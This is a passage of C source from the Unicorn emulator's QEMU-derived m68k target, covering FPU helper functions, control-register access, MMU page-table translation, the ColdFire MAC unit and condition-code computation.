floatx80_add(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fsub)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_sub(val1->d, val0->d, &env->fp_status); } void HELPER(fssub)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_sub(val1->d, val0->d, &env->fp_status); PREC_END(); } void HELPER(fdsub)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = floatx80_sub(val1->d, 
val0->d, &env->fp_status); PREC_END(); } void HELPER(fmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_mul(val0->d, val1->d, &env->fp_status); } void HELPER(fsmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_mul(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fdmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = floatx80_mul(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fsglmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { int rounding_mode = get_float_rounding_mode(&env->fp_status); floatx80 a, b; PREC_BEGIN(32); set_float_rounding_mode(float_round_to_zero, &env->fp_status); a = floatx80_round(val0->d, &env->fp_status); b = floatx80_round(val1->d, &env->fp_status); set_float_rounding_mode(rounding_mode, &env->fp_status); res->d = floatx80_mul(a, b, &env->fp_status); PREC_END(); } void HELPER(fdiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_div(val1->d, val0->d, &env->fp_status); } void HELPER(fsdiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_div(val1->d, val0->d, &env->fp_status); PREC_END(); } void HELPER(fddiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = floatx80_div(val1->d, val0->d, &env->fp_status); PREC_END(); } void HELPER(fsgldiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { int rounding_mode = get_float_rounding_mode(&env->fp_status); floatx80 a, b; PREC_BEGIN(32); set_float_rounding_mode(float_round_to_zero, &env->fp_status); a = floatx80_round(val1->d, &env->fp_status); b = floatx80_round(val0->d, &env->fp_status); set_float_rounding_mode(rounding_mode, &env->fp_status); res->d = floatx80_div(a, b, &env->fp_status); PREC_END(); } static int float_comp_to_cc(int float_compare) { switch (float_compare) { case float_relation_equal: return FPSR_CC_Z; case float_relation_less: return FPSR_CC_N; case float_relation_unordered: return FPSR_CC_A; case float_relation_greater: return 0; default: // g_assert_not_reached(); return 0; } } void HELPER(fcmp)(CPUM68KState *env, FPReg *val0, FPReg *val1) { int float_compare; float_compare = floatx80_compare(val1->d, val0->d, &env->fp_status); env->fpsr = (env->fpsr & ~FPSR_CC_MASK) | float_comp_to_cc(float_compare); } void HELPER(ftst)(CPUM68KState *env, FPReg *val) { uint32_t cc = 0; if (floatx80_is_neg(val->d)) { cc |= FPSR_CC_N; } if (floatx80_is_any_nan(val->d)) { cc |= FPSR_CC_A; } else if (floatx80_is_infinity(val->d)) { cc |= FPSR_CC_I; } else if (floatx80_is_zero(val->d)) { cc |= FPSR_CC_Z; } env->fpsr = (env->fpsr & ~FPSR_CC_MASK) | cc; } void HELPER(fconst)(CPUM68KState *env, FPReg *val, uint32_t offset) { val->d = fpu_rom[offset]; } typedef int (*float_access)(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra); static uint32_t fmovem_predec(CPUM68KState *env, uint32_t addr, uint32_t mask, float_access access_fn) { uintptr_t ra = GETPC(); int i, size; for (i = 7; i >= 0; i--, mask <<= 1) { if (mask & 0x80) { size = access_fn(env, addr, &env->fregs[i], ra); if ((mask & 0xff) != 0x80) { addr -= size; } } } return addr; } static uint32_t fmovem_postinc(CPUM68KState *env, uint32_t addr, uint32_t mask, float_access access_fn) { uintptr_t ra = GETPC(); int i, size; for (i = 0; i < 8; i++, mask <<= 1) { if (mask & 0x80) { size = access_fn(env, addr, &env->fregs[i], ra); addr += size; } } return addr; } static int 
cpu_ld_floatx80_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { uint32_t high; uint64_t low; high = cpu_ldl_data_ra(env, addr, ra); low = cpu_ldq_data_ra(env, addr + 4, ra); fp->l.upper = high >> 16; fp->l.lower = low; return 12; } static int cpu_st_floatx80_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { cpu_stl_data_ra(env, addr, fp->l.upper << 16, ra); cpu_stq_data_ra(env, addr + 4, fp->l.lower, ra); return 12; } static int cpu_ld_float64_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { uint64_t val; val = cpu_ldq_data_ra(env, addr, ra); fp->d = float64_to_floatx80(*(float64 *)&val, &env->fp_status); return 8; } static int cpu_st_float64_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { float64 val; val = floatx80_to_float64(fp->d, &env->fp_status); cpu_stq_data_ra(env, addr, *(uint64_t *)&val, ra); return 8; } uint32_t HELPER(fmovemx_st_predec)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_predec(env, addr, mask, cpu_st_floatx80_ra); } uint32_t HELPER(fmovemx_st_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_st_floatx80_ra); } uint32_t HELPER(fmovemx_ld_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_ld_floatx80_ra); } uint32_t HELPER(fmovemd_st_predec)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_predec(env, addr, mask, cpu_st_float64_ra); } uint32_t HELPER(fmovemd_st_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_st_float64_ra); } uint32_t HELPER(fmovemd_ld_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_ld_float64_ra); } static void make_quotient(CPUM68KState *env, floatx80 val) { int32_t quotient; int sign; if (floatx80_is_any_nan(val)) { return; } quotient = floatx80_to_int32(val, &env->fp_status); sign = quotient < 0; if (sign) { quotient = -quotient; } quotient = (sign << 7) | (quotient & 0x7f); env->fpsr = (env->fpsr & ~FPSR_QT_MASK) | (quotient << FPSR_QT_SHIFT); } void HELPER(fmod)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_mod(val1->d, val0->d, &env->fp_status); make_quotient(env, res->d); } void HELPER(frem)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_rem(val1->d, val0->d, &env->fp_status); make_quotient(env, res->d); } void HELPER(fgetexp)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_getexp(val->d, &env->fp_status); } void HELPER(fgetman)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_getman(val->d, &env->fp_status); } void HELPER(fscale)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_scale(val1->d, val0->d, &env->fp_status); } void HELPER(flognp1)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_lognp1(val->d, &env->fp_status); } void HELPER(flogn)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_logn(val->d, &env->fp_status); } void HELPER(flog10)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_log10(val->d, &env->fp_status); } void HELPER(flog2)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_log2(val->d, &env->fp_status); } void HELPER(fetox)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_etox(val->d, &env->fp_status); } void HELPER(ftwotox)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_twotox(val->d, &env->fp_status); } void 
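/* the transcendental helpers below are thin wrappers around the FPSP-derived floatx80_* routines in softfloat.c */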
HELPER(ftentox)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_tentox(val->d, &env->fp_status);
}

void HELPER(ftan)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_tan(val->d, &env->fp_status);
}

void HELPER(fsin)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_sin(val->d, &env->fp_status);
}

void HELPER(fcos)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_cos(val->d, &env->fp_status);
}

void HELPER(fsincos)(CPUM68KState *env, FPReg *res0, FPReg *res1, FPReg *val)
{
    floatx80 a = val->d;
    /*
     * If res0 and res1 specify the same floating-point data register,
     * the sine result is stored in the register, and the cosine
     * result is discarded.
     */
    res1->d = floatx80_cos(a, &env->fp_status);
    res0->d = floatx80_sin(a, &env->fp_status);
}

void HELPER(fatan)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_atan(val->d, &env->fp_status);
}

void HELPER(fasin)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_asin(val->d, &env->fp_status);
}

void HELPER(facos)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_acos(val->d, &env->fp_status);
}

void HELPER(fatanh)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_atanh(val->d, &env->fp_status);
}

void HELPER(ftanh)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_tanh(val->d, &env->fp_status);
}

void HELPER(fsinh)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_sinh(val->d, &env->fp_status);
}

void HELPER(fcosh)(CPUM68KState *env, FPReg *res, FPReg *val)
{
    res->d = floatx80_cosh(val->d, &env->fp_status);
}

unicorn-2.1.1/qemu/target/m68k/helper.c

/*
 * m68k op helpers
 *
 * Copyright (c) 2006-2007 CodeSourcery
 * Written by Paul Brook
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "exec/helper-proto.h"
#include "fpu/softfloat.h"

#define SIGNBIT (1u << 31)

void HELPER(cf_movec_to)(CPUM68KState *env, uint32_t reg, uint32_t val)
{
    switch (reg) {
    case M68K_CR_CACR:
        env->cacr = val;
        m68k_switch_sp(env);
        break;
    case M68K_CR_ACR0:
    case M68K_CR_ACR1:
    case M68K_CR_ACR2:
    case M68K_CR_ACR3:
        /* TODO: Implement Access Control Registers. */
        break;
    case M68K_CR_VBR:
        env->vbr = val;
        break;
    /* TODO: Implement control registers.
*/ default: cpu_abort(env_cpu(env), "Unimplemented control register write 0x%x = 0x%x\n", reg, val); } } void HELPER(m68k_movec_to)(CPUM68KState *env, uint32_t reg, uint32_t val) { switch (reg) { /* MC680[1234]0 */ case M68K_CR_SFC: env->sfc = val & 7; return; case M68K_CR_DFC: env->dfc = val & 7; return; case M68K_CR_VBR: env->vbr = val; return; /* MC680[2346]0 */ case M68K_CR_CACR: if (m68k_feature(env, M68K_FEATURE_M68020)) { env->cacr = val & 0x0000000f; } else if (m68k_feature(env, M68K_FEATURE_M68030)) { env->cacr = val & 0x00003f1f; } else if (m68k_feature(env, M68K_FEATURE_M68040)) { env->cacr = val & 0x80008000; } else if (m68k_feature(env, M68K_FEATURE_M68060)) { env->cacr = val & 0xf8e0e000; } m68k_switch_sp(env); return; /* MC680[34]0 */ case M68K_CR_TC: env->mmu.tcr = val; return; case M68K_CR_MMUSR: env->mmu.mmusr = val; return; case M68K_CR_SRP: env->mmu.srp = val; return; case M68K_CR_URP: env->mmu.urp = val; return; case M68K_CR_USP: env->sp[M68K_USP] = val; return; case M68K_CR_MSP: env->sp[M68K_SSP] = val; return; case M68K_CR_ISP: env->sp[M68K_ISP] = val; return; /* MC68040/MC68LC040 */ case M68K_CR_ITT0: env->mmu.ttr[M68K_ITTR0] = val; return; case M68K_CR_ITT1: env->mmu.ttr[M68K_ITTR1] = val; return; case M68K_CR_DTT0: env->mmu.ttr[M68K_DTTR0] = val; return; case M68K_CR_DTT1: env->mmu.ttr[M68K_DTTR1] = val; return; } cpu_abort(env_cpu(env), "Unimplemented control register write 0x%x = 0x%x\n", reg, val); } uint32_t HELPER(m68k_movec_from)(CPUM68KState *env, uint32_t reg) { switch (reg) { /* MC680[1234]0 */ case M68K_CR_SFC: return env->sfc; case M68K_CR_DFC: return env->dfc; case M68K_CR_VBR: return env->vbr; /* MC680[234]0 */ case M68K_CR_CACR: return env->cacr; /* MC680[34]0 */ case M68K_CR_TC: return env->mmu.tcr; case M68K_CR_MMUSR: return env->mmu.mmusr; case M68K_CR_SRP: return env->mmu.srp; case M68K_CR_USP: return env->sp[M68K_USP]; case M68K_CR_MSP: return env->sp[M68K_SSP]; case M68K_CR_ISP: return env->sp[M68K_ISP]; /* MC68040/MC68LC040 */ case M68K_CR_URP: return env->mmu.urp; case M68K_CR_ITT0: return env->mmu.ttr[M68K_ITTR0]; case M68K_CR_ITT1: return env->mmu.ttr[M68K_ITTR1]; case M68K_CR_DTT0: return env->mmu.ttr[M68K_DTTR0]; case M68K_CR_DTT1: return env->mmu.ttr[M68K_DTTR1]; } cpu_abort(env_cpu(env), "Unimplemented control register read 0x%x\n", reg); } void HELPER(set_macsr)(CPUM68KState *env, uint32_t val) { uint32_t acc; int8_t exthigh; uint8_t extlow; uint64_t regval; int i; if ((env->macsr ^ val) & (MACSR_FI | MACSR_SU)) { for (i = 0; i < 4; i++) { regval = env->macc[i]; exthigh = regval >> 40; if (env->macsr & MACSR_FI) { acc = regval >> 8; extlow = regval; } else { acc = regval; extlow = regval >> 32; } if (env->macsr & MACSR_FI) { regval = (((uint64_t)acc) << 8) | extlow; regval |= ((int64_t)exthigh) << 40; } else if (env->macsr & MACSR_SU) { regval = acc | (((int64_t)extlow) << 32); regval |= ((int64_t)exthigh) << 40; } else { regval = acc | (((uint64_t)extlow) << 32); regval |= ((uint64_t)(uint8_t)exthigh) << 40; } env->macc[i] = regval; } } env->macsr = val; } void m68k_switch_sp(CPUM68KState *env) { int new_sp; env->sp[env->current_sp] = env->aregs[7]; if (m68k_feature(env, M68K_FEATURE_M68000)) { if (env->sr & SR_S) { if (env->sr & SR_M) { new_sp = M68K_SSP; } else { new_sp = M68K_ISP; } } else { new_sp = M68K_USP; } } else { new_sp = (env->sr & SR_S && env->cacr & M68K_CACR_EUSP) ? 
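/* ColdFire: a separate user stack pointer exists only when CACR.EUSP is set */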
M68K_SSP : M68K_USP; } env->aregs[7] = env->sp[new_sp]; env->current_sp = new_sp; } static int check_TTR(uint32_t ttr, int *prot, target_ulong addr, int access_type) { uint32_t base, mask; /* check if transparent translation is enabled */ if ((ttr & M68K_TTR_ENABLED) == 0) { return 0; } /* check mode access */ switch (ttr & M68K_TTR_SFIELD) { case M68K_TTR_SFIELD_USER: /* match only if user */ if ((access_type & ACCESS_SUPER) != 0) { return 0; } break; case M68K_TTR_SFIELD_SUPER: /* match only if supervisor */ if ((access_type & ACCESS_SUPER) == 0) { return 0; } break; default: /* all other values disable mode matching (FC2) */ break; } /* check address matching */ base = ttr & M68K_TTR_ADDR_BASE; mask = (ttr & M68K_TTR_ADDR_MASK) ^ M68K_TTR_ADDR_MASK; mask <<= M68K_TTR_ADDR_MASK_SHIFT; if ((addr & mask) != (base & mask)) { return 0; } *prot = PAGE_READ | PAGE_EXEC; if ((ttr & M68K_DESC_WRITEPROT) == 0) { *prot |= PAGE_WRITE; } return 1; } static int get_physical_address(CPUM68KState *env, hwaddr *physical, int *prot, target_ulong address, int access_type, target_ulong *page_size) { CPUState *cs = env_cpu(env); uint32_t entry; uint32_t next; target_ulong page_mask; bool debug = access_type & ACCESS_DEBUG; int page_bits; int i; MemTxResult txres; /* Transparent Translation (physical = logical) */ for (i = 0; i < M68K_MAX_TTR; i++) { if (check_TTR(env->mmu.TTR(access_type, i), prot, address, access_type)) { if (access_type & ACCESS_PTEST) { /* Transparent Translation Register bit */ env->mmu.mmusr = M68K_MMU_T_040 | M68K_MMU_R_040; } *physical = address & TARGET_PAGE_MASK; *page_size = TARGET_PAGE_SIZE; return 0; } } /* Page Table Root Pointer */ *prot = PAGE_READ | PAGE_WRITE; if (access_type & ACCESS_CODE) { *prot |= PAGE_EXEC; } if (access_type & ACCESS_SUPER) { next = env->mmu.srp; } else { next = env->mmu.urp; } /* Root Index */ entry = M68K_POINTER_BASE(next) | M68K_ROOT_INDEX(address); next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } if (!M68K_UDT_VALID(next)) { return -1; } if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } if (next & M68K_DESC_WRITEPROT) { if (access_type & ACCESS_PTEST) { env->mmu.mmusr |= M68K_MMU_WP_040; } *prot &= ~PAGE_WRITE; if (access_type & ACCESS_STORE) { return -1; } } /* Pointer Index */ entry = M68K_POINTER_BASE(next) | M68K_POINTER_INDEX(address); next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } if (!M68K_UDT_VALID(next)) { return -1; } if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } if (next & M68K_DESC_WRITEPROT) { if (access_type & ACCESS_PTEST) { env->mmu.mmusr |= M68K_MMU_WP_040; } *prot &= ~PAGE_WRITE; if (access_type & ACCESS_STORE) { return -1; } } /* Page Index */ if (env->mmu.tcr & M68K_TCR_PAGE_8K) { entry = M68K_8K_PAGE_BASE(next) | M68K_8K_PAGE_INDEX(address); } else { entry = M68K_4K_PAGE_BASE(next) | M68K_4K_PAGE_INDEX(address); } next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } if (!M68K_PDT_VALID(next)) { 
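/* invalid page descriptor: report a translation fault to the caller */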
return -1; } if (M68K_PDT_INDIRECT(next)) { next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, M68K_INDIRECT_POINTER(next), MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } if (access_type & ACCESS_STORE) { if (next & M68K_DESC_WRITEPROT) { if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } } else if ((next & (M68K_DESC_MODIFIED | M68K_DESC_USED)) != (M68K_DESC_MODIFIED | M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | (M68K_DESC_MODIFIED | M68K_DESC_USED), MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } } else { if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } } if (env->mmu.tcr & M68K_TCR_PAGE_8K) { page_bits = 13; } else { page_bits = 12; } *page_size = 1 << page_bits; page_mask = ~(*page_size - 1); *physical = next & page_mask; if (access_type & ACCESS_PTEST) { env->mmu.mmusr |= next & M68K_MMU_SR_MASK_040; env->mmu.mmusr |= *physical & 0xfffff000; env->mmu.mmusr |= M68K_MMU_R_040; } if (next & M68K_DESC_WRITEPROT) { *prot &= ~PAGE_WRITE; if (access_type & ACCESS_STORE) { return -1; } } if (next & M68K_DESC_SUPERONLY) { if ((access_type & ACCESS_SUPER) == 0) { return -1; } } return 0; txfail: /* * A page table load/store failed. TODO: we should really raise a * suitable guest fault here if this is not a debug access. * For now just return that the translation failed. */ return -1; } hwaddr m68k_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; hwaddr phys_addr; int prot; int access_type; target_ulong page_size; if ((env->mmu.tcr & M68K_TCR_ENABLED) == 0) { /* MMU disabled */ return addr; } access_type = ACCESS_DATA | ACCESS_DEBUG; if (env->sr & SR_S) { access_type |= ACCESS_SUPER; } if (get_physical_address(env, &phys_addr, &prot, addr, access_type, &page_size) != 0) { return -1; } return phys_addr; } /* * Notify CPU of a pending interrupt. Prioritization and vectoring should * be handled by the interrupt controller. Real hardware only requests * the vector when the interrupt is acknowledged by the CPU. For * simplicity we calculate it when the interrupt is signalled. 
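* A pending level of zero cancels the request rather than raising one.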
*/ void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector) { CPUState *cs = CPU(cpu); CPUM68KState *env = &cpu->env; env->pending_level = level; env->pending_vector = vector; if (level) { cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); } } bool m68k_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType qemu_access_type, int mmu_idx, bool probe, uintptr_t retaddr) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; hwaddr physical; int prot; int access_type; int ret; target_ulong page_size; if ((env->mmu.tcr & M68K_TCR_ENABLED) == 0) { /* MMU disabled */ tlb_set_page(cs, address & TARGET_PAGE_MASK, address & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return true; } if (qemu_access_type == MMU_INST_FETCH) { access_type = ACCESS_CODE; } else { access_type = ACCESS_DATA; if (qemu_access_type == MMU_DATA_STORE) { access_type |= ACCESS_STORE; } } if (mmu_idx != MMU_USER_IDX) { access_type |= ACCESS_SUPER; } ret = get_physical_address(&cpu->env, &physical, &prot, address, access_type, &page_size); if (likely(ret == 0)) { address &= TARGET_PAGE_MASK; physical += address & (page_size - 1); tlb_set_page(cs, address, physical, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } if (probe) { return false; } /* page fault */ env->mmu.ssw = M68K_ATC_040; switch (size) { case 1: env->mmu.ssw |= M68K_BA_SIZE_BYTE; break; case 2: env->mmu.ssw |= M68K_BA_SIZE_WORD; break; case 4: env->mmu.ssw |= M68K_BA_SIZE_LONG; break; } if (access_type & ACCESS_SUPER) { env->mmu.ssw |= M68K_TM_040_SUPER; } if (access_type & ACCESS_CODE) { env->mmu.ssw |= M68K_TM_040_CODE; } else { env->mmu.ssw |= M68K_TM_040_DATA; } if (!(access_type & ACCESS_STORE)) { env->mmu.ssw |= M68K_RW_040; } cs->exception_index = EXCP_ACCESS; env->mmu.ar = address; cpu_loop_exit_restore(cs, retaddr); } uint32_t HELPER(bitrev)(uint32_t x) { x = ((x >> 1) & 0x55555555u) | ((x << 1) & 0xaaaaaaaau); x = ((x >> 2) & 0x33333333u) | ((x << 2) & 0xccccccccu); x = ((x >> 4) & 0x0f0f0f0fu) | ((x << 4) & 0xf0f0f0f0u); return bswap32(x); } uint32_t HELPER(ff1)(uint32_t x) { int n; for (n = 32; x; n--) x >>= 1; return n; } uint32_t HELPER(sats)(uint32_t val, uint32_t v) { /* The result has the opposite sign to the original value. */ if ((int32_t)v < 0) { val = (((int32_t)val) >> 31) ^ SIGNBIT; } return val; } void cpu_m68k_set_sr(CPUM68KState *env, uint32_t sr) { env->sr = sr & 0xffe0; cpu_m68k_set_ccr(env, sr); m68k_switch_sp(env); } void HELPER(set_sr)(CPUM68KState *env, uint32_t val) { cpu_m68k_set_sr(env, val); } /* MAC unit. */ /* * FIXME: The MAC unit implementation is a bit of a mess. Some helpers * take values, others take register numbers and manipulate the contents * in-place. */ void HELPER(mac_move)(CPUM68KState *env, uint32_t dest, uint32_t src) { uint32_t mask; env->macc[dest] = env->macc[src]; mask = MACSR_PAV0 << dest; if (env->macsr & (MACSR_PAV0 << src)) env->macsr |= mask; else env->macsr &= ~mask; } uint64_t HELPER(macmuls)(CPUM68KState *env, uint32_t op1, uint32_t op2) { int64_t product; int64_t res; product = (uint64_t)op1 * op2; res = (product << 24) >> 24; if (res != product) { env->macsr |= MACSR_V; if (env->macsr & MACSR_OMC) { /* Make sure the accumulate operation overflows. 
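* The forced value of roughly +/-2^50 lies outside the 48-bit accumulator range.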
*/ if (product < 0) res = ~(1ll << 50); else res = 1ll << 50; } } return res; } uint64_t HELPER(macmulu)(CPUM68KState *env, uint32_t op1, uint32_t op2) { uint64_t product; product = (uint64_t)op1 * op2; if (product & (0xffffffull << 40)) { env->macsr |= MACSR_V; if (env->macsr & MACSR_OMC) { /* Make sure the accumulate operation overflows. */ product = 1ll << 50; } else { product &= ((1ull << 40) - 1); } } return product; } uint64_t HELPER(macmulf)(CPUM68KState *env, uint32_t op1, uint32_t op2) { uint64_t product; uint32_t remainder; product = (uint64_t)op1 * op2; if (env->macsr & MACSR_RT) { remainder = product & 0xffffff; product >>= 24; if (remainder > 0x800000) product++; else if (remainder == 0x800000) product += (product & 1); } else { product >>= 24; } return product; } void HELPER(macsats)(CPUM68KState *env, uint32_t acc) { int64_t tmp; int64_t result; tmp = env->macc[acc]; result = ((tmp << 16) >> 16); if (result != tmp) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_V) { env->macsr |= MACSR_PAV0 << acc; if (env->macsr & MACSR_OMC) { /* * The result is saturated to 32 bits, despite overflow occurring * at 48 bits. Seems weird, but that's what the hardware docs * say. */ result = (result >> 63) ^ 0x7fffffff; } } env->macc[acc] = result; } void HELPER(macsatu)(CPUM68KState *env, uint32_t acc) { uint64_t val; val = env->macc[acc]; if (val & (0xffffull << 48)) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_V) { env->macsr |= MACSR_PAV0 << acc; if (env->macsr & MACSR_OMC) { if (val > (1ull << 53)) val = 0; else val = (1ull << 48) - 1; } else { val &= ((1ull << 48) - 1); } } env->macc[acc] = val; } void HELPER(macsatf)(CPUM68KState *env, uint32_t acc) { int64_t sum; int64_t result; sum = env->macc[acc]; result = (sum << 16) >> 16; if (result != sum) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_V) { env->macsr |= MACSR_PAV0 << acc; if (env->macsr & MACSR_OMC) { result = (result >> 63) ^ 0x7fffffffffffll; } } env->macc[acc] = result; } void HELPER(mac_set_flags)(CPUM68KState *env, uint32_t acc) { uint64_t val; val = env->macc[acc]; if (val == 0) { env->macsr |= MACSR_Z; } else if (val & (1ull << 47)) { env->macsr |= MACSR_N; } if (env->macsr & (MACSR_PAV0 << acc)) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_FI) { val = ((int64_t)val) >> 40; if (val != 0 && val != -1) env->macsr |= MACSR_EV; } else if (env->macsr & MACSR_SU) { val = ((int64_t)val) >> 32; if (val != 0 && val != -1) env->macsr |= MACSR_EV; } else { if ((val >> 32) != 0) env->macsr |= MACSR_EV; } } #define EXTSIGN(val, index) ( \ (index == 0) ? (int8_t)(val) : ((index == 1) ? (int16_t)(val) : (val)) \ ) #define COMPUTE_CCR(op, x, n, z, v, c) { \ switch (op) { \ case CC_OP_FLAGS: \ /* Everything in place. 
*/ \ break; \ case CC_OP_ADDB: \ case CC_OP_ADDW: \ case CC_OP_ADDL: \ res = n; \ src2 = v; \ src1 = EXTSIGN(res - src2, op - CC_OP_ADDB); \ c = x; \ z = n; \ v = (res ^ src1) & ~(src1 ^ src2); \ break; \ case CC_OP_SUBB: \ case CC_OP_SUBW: \ case CC_OP_SUBL: \ res = n; \ src2 = v; \ src1 = EXTSIGN(res + src2, op - CC_OP_SUBB); \ c = x; \ z = n; \ v = (res ^ src1) & (src1 ^ src2); \ break; \ case CC_OP_CMPB: \ case CC_OP_CMPW: \ case CC_OP_CMPL: \ src1 = n; \ src2 = v; \ res = EXTSIGN(src1 - src2, op - CC_OP_CMPB); \ n = res; \ z = res; \ c = src1 < src2; \ v = (res ^ src1) & (src1 ^ src2); \ break; \ case CC_OP_LOGIC: \ c = v = 0; \ z = n; \ break; \ default: \ cpu_abort(env_cpu(env), "Bad CC_OP %d", op); \ } \ } while (0) uint32_t cpu_m68k_get_ccr(CPUM68KState *env) { uint32_t x, c, n, z, v; uint32_t res, src1, src2; x = env->cc_x; n = env->cc_n; z = env->cc_z; v = env->cc_v; c = env->cc_c; COMPUTE_CCR(env->cc_op, x, n, z, v, c); n = n >> 31; z = (z == 0); v = v >> 31; return x * CCF_X + n * CCF_N + z * CCF_Z + v * CCF_V + c * CCF_C; } uint32_t HELPER(get_ccr)(CPUM68KState *env) { return cpu_m68k_get_ccr(env); } void 